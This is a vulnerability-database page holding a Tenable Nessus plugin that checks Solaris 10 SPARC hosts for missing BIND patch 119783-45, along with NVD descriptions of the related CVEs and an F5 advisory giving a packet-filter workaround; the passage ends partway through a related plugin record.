ID SOLARIS10_119783-45.NASL Type nessus Reporter This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2020-07-14T00:00:00
Description
Vulnerability in the Solaris component of Oracle Sun Products Suite
(subcomponent: Bind/Postinstall script for Bind package). The
supported version that is affected is 10. Very difficult to exploit
vulnerability requiring logon to Operating System plus additional
login/authentication to component or subcomponent. Successful attack
of this vulnerability can escalate attacker privileges resulting in
unauthorized Operating System takeover including arbitrary code
execution.
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text in this plugin was
# extracted from the Oracle SunOS Patch Updates.
#
include("compat.inc");
if (description)
{
script_id(138421);
script_version("1.3");
script_set_attribute(attribute:"plugin_modification_date", value:"2020/08/13");
script_cve_id("CVE-2007-2926", "CVE-2009-0696", "CVE-2013-0415");
script_name(english:"Solaris 10 (sparc) : 119783-45");
script_summary(english:"Check for patch 119783-45");
script_set_attribute(
attribute:"synopsis",
value:"The remote host is missing Sun Security Patch number 119783-45"
);
script_set_attribute(
attribute:"description",
value:
"Vulnerability in the Solaris component of Oracle Sun Products Suite
(subcomponent: Bind/Postinstall script for Bind package). The
supported version that is affected is 10. Very difficult to exploit
vulnerability requiring logon to Operating System plus additional
login/authentication to component or subcomponent. Successful attack
of this vulnerability can escalate attacker privileges resulting in
unauthorized Operating System takeover including arbitrary code
execution."
);
script_set_attribute(
attribute:"see_also",
value:"https://getupdates.oracle.com/readme/119783-45"
);
script_set_attribute(attribute:"solution", value:"Install patch 119783-45 or higher");
script_set_cvss_base_vector("CVSS2#AV:L/AC:H/Au:S/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2013-0415");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_cwe_id(16);
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:solaris:10:119783");
script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:solaris:10");
script_set_attribute(attribute:"vuln_publication_date", value:"2007/07/24");
script_set_attribute(attribute:"patch_publication_date", value:"2020/07/13");
script_set_attribute(attribute:"plugin_publication_date", value:"2020/07/14");
script_set_attribute(attribute:"generated_plugin", value:"current");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"Solaris Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/Solaris/showrev");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("solaris.inc");
showrev = get_kb_item("Host/Solaris/showrev");
if (empty_or_null(showrev)) audit(AUDIT_OS_NOT, "Solaris");
os_ver = pregmatch(pattern:"Release: (\d+.(\d+))", string:showrev);
if (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Solaris");
full_ver = os_ver[1];
os_level = os_ver[2];
if (full_ver != "5.10") audit(AUDIT_OS_NOT, "Solaris 10", "Solaris " + os_level);
package_arch = pregmatch(pattern:"Application architecture: (\w+)", string:showrev);
if (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);
package_arch = package_arch[1];
if (package_arch != "sparc") audit(AUDIT_ARCH_NOT, "sparc", package_arch);
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"119783-45", obsoleted_by:"", package:"SUNWbind", version:"11.10.0,REV=2005.01.08.05.16") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"119783-45", obsoleted_by:"", package:"SUNWbindS", version:"11.10.0,REV=2005.01.08.05.16") < 0) flag++;
if (solaris_check_patch(release:"5.10", arch:"sparc", patch:"119783-45", obsoleted_by:"", package:"SUNWbindr", version:"11.10.0,REV=2005.01.08.05.16") < 0) flag++;
if (flag) {
security_report_v4(
port : 0,
severity : SECURITY_WARNING,
extra : solaris_get_report()
);
} else {
patch_fix = solaris_patch_fix_get();
if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, "Solaris 10");
tested = solaris_pkg_tests_get();
if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
audit(AUDIT_PACKAGE_NOT_INSTALLED, "SUNWbind / SUNWbindS / SUNWbindr");
}
{"id": "SOLARIS10_119783-45.NASL", "bulletinFamily": "scanner", "title": "Solaris 10 (sparc) : 119783-45", "description": "Vulnerability in the Solaris component of Oracle Sun Products Suite\n(subcomponent: Bind/Postinstall script for Bind package). The\nsupported version that is affected is 10. Very difficult to exploit\nvulnerability requiring logon to Operating System plus additional\nlogin/authentication to component or subcomponent. Successful attack\nof this vulnerability can escalate attacker privileges resulting in\nunauthorized Operating System takeover including arbitrary code\nexecution.", "published": "2020-07-14T00:00:00", "modified": "2020-07-14T00:00:00", "cvss": {"score": 6.0, "vector": "AV:L/AC:H/Au:S/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/138421", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://getupdates.oracle.com/readme/119783-45"], "cvelist": ["CVE-2009-0696", "CVE-2013-0415", "CVE-2007-2926"], "type": "nessus", "lastseen": "2020-08-14T12:48:49", "edition": 3, "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-0415", "CVE-2007-2926", "CVE-2009-0696"]}, {"type": "f5", "idList": ["SOL10366"]}, {"type": "nessus", "idList": ["SOLARIS10_119783-42.NASL", "SOLARIS10_119783-43.NASL", "SOLARIS10_119783-44.NASL", "SOLARIS10_X86_119784-45.NASL", "SOLARIS10_X86_119784-46.NASL", "SOLARIS10_119783-46.NASL", "SOLARIS10_X86_119784-43.NASL", "SOLARIS10_X86_119784-44.NASL", "SOLARIS10_X86_119784-41.NASL", "SOLARIS10_X86_119784-42.NASL"]}, {"type": "freebsd", "idList": ["3DE342FB-40BE-11DC-AEAC-02E0185F8D72"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1341-1:6D610", "DEBIAN:DSA-1342-2:075A0"]}, {"type": "centos", "idList": ["CESA-2007:0740-01", "CESA-2007:0740"]}, {"type": "ubuntu", "idList": ["USN-491-1"]}, {"type": "osvdb", "idList": ["OSVDB:36235"]}, {"type": "cert", "idList": ["VU:252735"]}, {"type": "suse", "idList": ["SUSE-SA:2007:047", "SUSE-SA:2009:040"]}, {"type": "oraclelinux", "idList": ["ELSA-2007-0740"]}, {"type": "redhat", "idList": ["RHSA-2007:0740", "RHSA-2009:1179"]}, {"type": "fedora", "idList": ["FEDORA:L6QFZNNT017703"]}, {"type": "openvas", "idList": ["OPENVAS:58816", "OPENVAS:65424", "OPENVAS:835018", "OPENVAS:58473", "OPENVAS:840177", "OPENVAS:65512", "OPENVAS:58513", "OPENVAS:136141256231065424", "OPENVAS:850109", "OPENVAS:58512"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:10109"]}, {"type": "seebug", "idList": ["SSV:11919"]}], "modified": "2020-08-14T12:48:49", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2020-08-14T12:48:49", "rev": 2}, "vulnersScore": 7.4}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(138421);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/13\");\n\n script_cve_id(\"CVE-2007-2926\", \"CVE-2009-0696\", \"CVE-2013-0415\");\n\n script_name(english:\"Solaris 10 (sparc) : 119783-45\");\n script_summary(english:\"Check for patch 119783-45\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote host is missing Sun Security Patch number 119783-45\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Vulnerability in the Solaris component of Oracle Sun Products Suite\n(subcomponent: Bind/Postinstall script for Bind package). The\nsupported version that is affected is 10. Very difficult to exploit\nvulnerability requiring logon to Operating System plus additional\nlogin/authentication to component or subcomponent. Successful attack\nof this vulnerability can escalate attacker privileges resulting in\nunauthorized Operating System takeover including arbitrary code\nexecution.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119783-45\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119783-45 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-0415\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(16);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:solaris:10:119783\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:solaris:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/07/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Solaris Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"solaris.inc\");\n\nshowrev = get_kb_item(\"Host/Solaris/showrev\");\nif (empty_or_null(showrev)) audit(AUDIT_OS_NOT, \"Solaris\");\nos_ver = pregmatch(pattern:\"Release: (\\d+.(\\d+))\", string:showrev);\nif (empty_or_null(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Solaris\");\nfull_ver = os_ver[1];\nos_level = os_ver[2];\nif (full_ver != \"5.10\") audit(AUDIT_OS_NOT, \"Solaris 10\", \"Solaris \" + os_level);\npackage_arch = pregmatch(pattern:\"Application architecture: (\\w+)\", string:showrev);\nif (empty_or_null(package_arch)) audit(AUDIT_UNKNOWN_ARCH);\npackage_arch = package_arch[1];\nif (package_arch != \"sparc\") audit(AUDIT_ARCH_NOT, \"sparc\", package_arch);\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119783-45\", obsoleted_by:\"\", package:\"SUNWbind\", version:\"11.10.0,REV=2005.01.08.05.16\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119783-45\", obsoleted_by:\"\", package:\"SUNWbindS\", version:\"11.10.0,REV=2005.01.08.05.16\") < 0) flag++;\nif (solaris_check_patch(release:\"5.10\", arch:\"sparc\", patch:\"119783-45\", obsoleted_by:\"\", package:\"SUNWbindr\", version:\"11.10.0,REV=2005.01.08.05.16\") < 0) flag++;\n\nif (flag) {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : solaris_get_report()\n );\n} else {\n patch_fix = solaris_patch_fix_get();\n if (!empty_or_null(patch_fix)) audit(AUDIT_PATCH_INSTALLED, patch_fix, \"Solaris 10\");\n tested = solaris_pkg_tests_get();\n if (!empty_or_null(tested)) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUNWbind / SUNWbindS / SUNWbindr\");\n}\n", "naslFamily": "Solaris Local Security Checks", "pluginID": "138421", "cpe": ["p-cpe:/a:oracle:solaris:10:119783", "cpe:/o:oracle:solaris:10"], "cvss3": {}, "scheme": null}
{"cve": [{"lastseen": "2020-10-03T11:45:51", "description": "ISC BIND 9 through 9.5.0a5 uses a weak random number generator during generation of DNS query ids when answering resolver questions or sending NOTIFY messages to slave name servers, which makes it easier for remote attackers to guess the next query id and perform DNS cache poisoning.", "edition": 3, "cvss3": {}, "published": "2007-07-24T17:30:00", "title": "CVE-2007-2926", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-2926"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:isc:bind:9.0", "cpe:/a:isc:bind:9.1", "cpe:/a:isc:bind:9.3", "cpe:/a:isc:bind:9.2", "cpe:/a:isc:bind:9.5.0", "cpe:/a:isc:bind:9.4", "cpe:/a:isc:bind:9.5"], "id": "CVE-2007-2926", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-2926", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:isc:bind:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.4:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.5:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:54:11", "description": "The dns_db_findrdataset function in db.c in named in ISC BIND 9.4 before 9.4.3-P3, 9.5 before 9.5.1-P3, and 9.6 before 9.6.1-P1, when configured as a master server, allows remote attackers to cause a denial of service (assertion failure and daemon exit) via an ANY record in the prerequisite section of a crafted dynamic update message, as exploited in the wild in July 2009.", "edition": 3, "cvss3": {}, "published": "2009-07-29T17:30:00", "title": "CVE-2009-0696", "type": "cve", "cwe": ["CWE-16"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0696"], "modified": "2018-10-10T19:30:00", "cpe": ["cpe:/a:isc:bind:9.4.1", "cpe:/a:isc:bind:9.6.0", "cpe:/a:isc:bind:9.4.2", "cpe:/a:isc:bind:9.6.1", "cpe:/a:isc:bind:9.4.0", "cpe:/a:isc:bind:9.6", "cpe:/a:isc:bind:9.5.0", "cpe:/a:isc:bind:9.4", "cpe:/a:isc:bind:9.4.3", "cpe:/a:isc:bind:9.5"], "id": "CVE-2009-0696", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0696", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:isc:bind:9.6:r6_b1:*:*:esv:*:*:*", "cpe:2.3:a:isc:bind:9.6:r2:*:*:esv:*:*:*", "cpe:2.3:a:isc:bind:9.6:r5_b1:*:*:esv:*:*:*", "cpe:2.3:a:isc:bind:9.4.0:b4:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.6:r6_rc1:*:*:esv:*:*:*", "cpe:2.3:a:isc:bind:9.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.4.0:a3:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.4.3:b2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.4.0:b2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.4.0:a4:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.4.0:a5:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.6:r5:*:*:esv:*:*:*", "cpe:2.3:a:isc:bind:9.4:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.5.0:a3:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.6:r7_p2:*:*:esv:*:*:*", "cpe:2.3:a:isc:bind:9.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.5.0:a6:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.4.0:b1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.5.0:b2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.4.3:b1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.5.0:p2_w1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.5.0:a7:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.4.2:rc2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.4.0:a1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.5.0:a1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.6.0:b1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.6:r6_rc2:*:*:esv:*:*:*", "cpe:2.3:a:isc:bind:9.4.0:b3:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.6:r6:*:*:esv:*:*:*", "cpe:2.3:a:isc:bind:9.4.0:a6:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.6.0:p1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.5.0:b3:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.5:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.5.0:p2_w2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.5.0:a4:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.5.0:p2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.4.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.6:r7_p1:*:*:esv:*:*:*", "cpe:2.3:a:isc:bind:9.5.0:b1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.6:r7:*:*:esv:*:*:*", "cpe:2.3:a:isc:bind:9.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.5.0:p1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.6:*:*:*:esv:*:*:*", "cpe:2.3:a:isc:bind:9.4.0:a2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.6:r4:*:*:esv:*:*:*", "cpe:2.3:a:isc:bind:9.6:r3:*:*:esv:*:*:*", "cpe:2.3:a:isc:bind:9.6:r1:*:*:esv:*:*:*", "cpe:2.3:a:isc:bind:9.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.6.0:a1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.4.3:b3:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.6:r5_p1:*:*:esv:*:*:*", "cpe:2.3:a:isc:bind:9.6.1:b1:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.6:r9_p1:*:*:esv:*:*:*", "cpe:2.3:a:isc:bind:9.5.0:a2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.4.3:p2:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.6:r9:*:*:esv:*:*:*", "cpe:2.3:a:isc:bind:9.6:r4_p1:*:*:esv:*:*:*", "cpe:2.3:a:isc:bind:9.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:isc:bind:9.5.0:a5:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:45:53", "description": "Unspecified vulnerability in Oracle Sun Solaris 10 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to the Bind/Postinstall script for Bind package.", "edition": 3, "cvss3": {}, "published": "2013-01-17T01:55:00", "title": "CVE-2013-0415", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 1.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.0, "vectorString": "AV:L/AC:H/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0415"], "modified": "2017-09-19T01:35:00", "cpe": ["cpe:/o:sun:sunos:5.10", "cpe:/a:xerox:freeflow_print_server:8.0"], "id": "CVE-2013-0415", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0415", "cvss": {"score": 6.0, "vector": "AV:L/AC:H/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:xerox:freeflow_print_server:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.10:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2016-09-26T17:23:04", "bulletinFamily": "software", "cvelist": ["CVE-2009-0696"], "edition": 1, "description": "* F5 Product Development has determined that these BIG-IP and Enterprise Manager versions use a vulnerable version of BIND. However, the vulnerable code is not used by default on these BIG-IP or Enterprise Manager systems. These products are only vulnerable if BIND was manually configured and enabled to be the master for one or more zones:\n\nA malicious dynamic update packet can crash BIND versions 9.4, 9.5, and 9.6. This issue can occur even when dynamic updating is turned off.\n\nF5 has determined BIG-IP GTM software is vulnerable to the malicious dynamic update message described in CVE-2009-0696. This vulnerability is mitigated by the fact that BIND will immediately restart after the crash. However, an attacker could sustain an outage by continuing to send malicious packets.\n\nInformation about this advisory is available at the following locations: \n \n**Note**: These links take you to resources outside of AskF5, and it is possible that the documents may be removed without our knowledge. \n\n<http://www.kb.cert.org/vuls/id/725188> \n \n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0696>\n\nF5 Product Development tracked this issue as CR125853 for Enterprise Manager and it was fixed in Enterprise Manager version 2.0.0. For information about upgrading, refer to the Enterprise Manager release notes.\n\nF5 Product Development tracked this issue as CR125853 for BIG-IP LTM, GTM, ASM, PSM, WebAccelerator, and Link Controller, and it was fixed in version 9.4.8 and 10.1.0. For information about upgrading, refer to the BIG-IP LTM, GTM, ASM, PSM, WebAccelerator, and Link Controller release notes.\n\nAdditionally, this issue was fixed in Hotfix-BIGIP-9.3.1-74.0-HF7 issued for BIG-IP version 9.3.1, Hotfix-BIGIP-9.4.5-1091.0-HF3 issued for BIG-IP version 9.4.5, Hotfix-BIGIP-9.4.6-423.0-HF2 issued for BIG-IP version 9.4.6, Hotfix-BIGIP-9.4.7-326.0-HF1 issued for BIG-IP version 9.4.7, and Hotfix-BIGIP-10.0.1-342.0-HF1 issued for BIG-IP version 10.0.1. You may download these hotfixes or later versions of the hotfixes from the F5 [Downloads](<http://downloads.f5.com/esd/index.jsp>) site.\n\nFor information about downloading software, refer to SOL167: Downloading software from F5.\n\nFor information about the F5 hotfix policy, refer to SOL4918: Overview of F5 critical issue hotfix policy.\n\nFor information about how to manage F5 product hotfixes, refer to SOL6845: Managing F5 product hotfixes.\n\n**Workaround**\n\nYou can work around this issue by implementing the following packet filter workaround to filter and reject dynamic update packets by inspecting the opcode (operation code) of a DNS packet for updates.\n\n**Important**: Applying the packet filter using the following methods will reject all dynamic update packets. If you require dynamic updates, F5 highly recommends that you verify that the source is good/secure and construct packets filters that will allow updates from known good/secure sources and reject all dynamic updates from unknown sources.\n\nYou can implement the dynamic update packet filter using the following two methods:\n\n * Configuring the dynamic update packet filter using the Configuration utility\n * Configuring the dynamic update packet filter using the command line\n\n**Important**: As a result of a known issue with the **libpcap** library, the packet filters configured and applied in the following procedures may fail to load after approximately 15 successful load operations. For more information, refer to SOL10659: The libpcap library runs out of internal registers.\n\n**Configuring the dynamic update packet filter using the Configuration utility**\n\n 1. Log in to the Configuration utility.\n 2. Select** Network** from the left menu.\n 3. Select** General **from the **Packet Filter Menu** bar.\n 4. Select **Enabled** from the drop-down menu for **Packet Filtering**.\n 5. Select the **Filter established connections** option from the **Options **section.\n 6. Click **Update**.\n 7. Select **Rules** from the **Packet Filter Menu** bar.\n 8. Click **Create**.\n 9. Provide a name for the new packet filter. \n \nFor example: \n \ndrop_updates\n 10. Select **Order this filter should be placed on the list**. If you have **multiple packet filter**, place it as close to the beginning of the list as possible.\n 11. Select **Reject** from the **Action **menu.\n 12. Select **Enter Expression Text** from the **Filter Expression Method** option.\n 13. Enter the following syntax into the **Filter Expression box**: \n \ndst port 53 and( ( tcp[((tcp[12]>>2)+4)] & 0x78 = 0x28 ) or ( udp[10] & 0x78 = 0x28 ) )\n 14. Click **Finished**.\n\n**Configuring the dynamic update packet filter using the command line**\n\n 1. Log in to the command line.\n 2. Enable packet filtering by typing the following command: \n \nbigpipe db packetfilter enable\n 3. Enable packet filtering to be applied to already established traffic by typing the following command: \n \nbigpipe db packetfilter.established enable\n 4. Configure the packet filter by typing the following command syntax: \n \nbigpipe packet filter drop_updates { order 10 action reject filter '{ dst port 53 and ( ( tcp[((tcp[12]>>2)+4)] & 0x78 = 0x28 ) or ( udp[10] & 0x78 = 0x28 ) ) }' }\n 5. Save the changes made to the system by typing the following command: \n \nbigpipe save all\n", "modified": "2013-06-28T00:00:00", "published": "2009-07-28T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/10000/300/sol10366.html", "id": "SOL10366", "title": "SOL10366 - BIND vulnerability - CVE-2009-0696", "type": "f5", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-01T05:48:47", "description": "Vulnerability in the Solaris component of Oracle Sun Products Suite\n(subcomponent: Bind/Postinstall script for Bind package). The\nsupported version that is affected is 10. Very difficult to exploit\nvulnerability requiring logon to Operating System plus additional\nlogin/authentication to component or subcomponent. Successful attack\nof this vulnerability can escalate attacker privileges resulting in\nunauthorized Operating System takeover including arbitrary code\nexecution.", "edition": 18, "published": "2019-10-15T00:00:00", "title": "Solaris 10 (x86) : 119784-43", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0696", "CVE-2013-0415", "CVE-2007-2926"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:119784", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_X86_119784-43.NASL", "href": "https://www.tenable.com/plugins/nessus/129874", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(129874);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2020/01/07\");\n\n script_cve_id(\"CVE-2007-2926\", \"CVE-2009-0696\", \"CVE-2013-0415\");\n\n script_name(english:\"Solaris 10 (x86) : 119784-43\");\n script_summary(english:\"Check for patch 119784-43\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote host is missing Sun Security Patch number 119784-43\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vulnerability in the Solaris component of Oracle Sun Products Suite\n(subcomponent: Bind/Postinstall script for Bind package). The\nsupported version that is affected is 10. Very difficult to exploit\nvulnerability requiring logon to Operating System plus additional\nlogin/authentication to component or subcomponent. Successful attack\nof this vulnerability can escalate attacker privileges resulting in\nunauthorized Operating System takeover including arbitrary code\nexecution.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://getupdates.oracle.com/readme/119784-43\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Install patch 119784-43 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-0415\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(16);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 